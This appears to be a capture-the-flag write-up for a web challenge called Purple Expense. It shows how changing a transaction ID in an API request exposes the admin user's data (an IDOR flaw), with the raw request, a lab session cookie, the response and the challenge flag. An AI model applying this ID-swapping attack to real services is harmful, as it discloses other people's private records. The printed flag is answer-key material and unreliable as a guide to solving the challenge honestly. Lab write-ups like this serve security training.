# Purple Expense

## CHALLENGE INFO

We are working on this cool new startup that is a platform to keep track of user's expenses and income. We are providing you with a mockup build of the website, see if you can find a way to disclose sensitive information of the "admin" user to find the flag.

## Challange download and instructions

[web_purple_expense](web_purple_expense.zip)

To run challange you need some linux with docker

- unzip file
- run ./build-docker.sh

## Solve

<details>
<summary>Click this to collapse/fold.</summary>

From source code login with any user with password from `database.js` with Burp suite in background.

Change ID from `/api/transactions/<id>` to `73` (id for admin)

```
GET /api/transactions/73 HTTP/1.1
Host: 206.189.18.74:31861
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://206.189.18.74:31861/dashboard
DNT: 1
Connection: close
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImxvdWlzYmFybmV0dCIsImlhdCI6MTYzNDU5MjM2NH0.vz5Xnx7872fsD4jEbqoX3vMPwbVfKy-BsJEhxlBGB_Q
```

Get the flag:

```
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 122
Date: Mon, 18 Oct 2021 21:27:02 GMT
Connection: close

{"transactions":[{"id":1,"user_uid":73,"type":"Income","description":"🚩 HTB{Id0rs_f0r_Br34kfa57} 🚩","amount":1337}]}
```

</details>

## Flag

HTB{Id0rs_f0r_Br34kfa57}

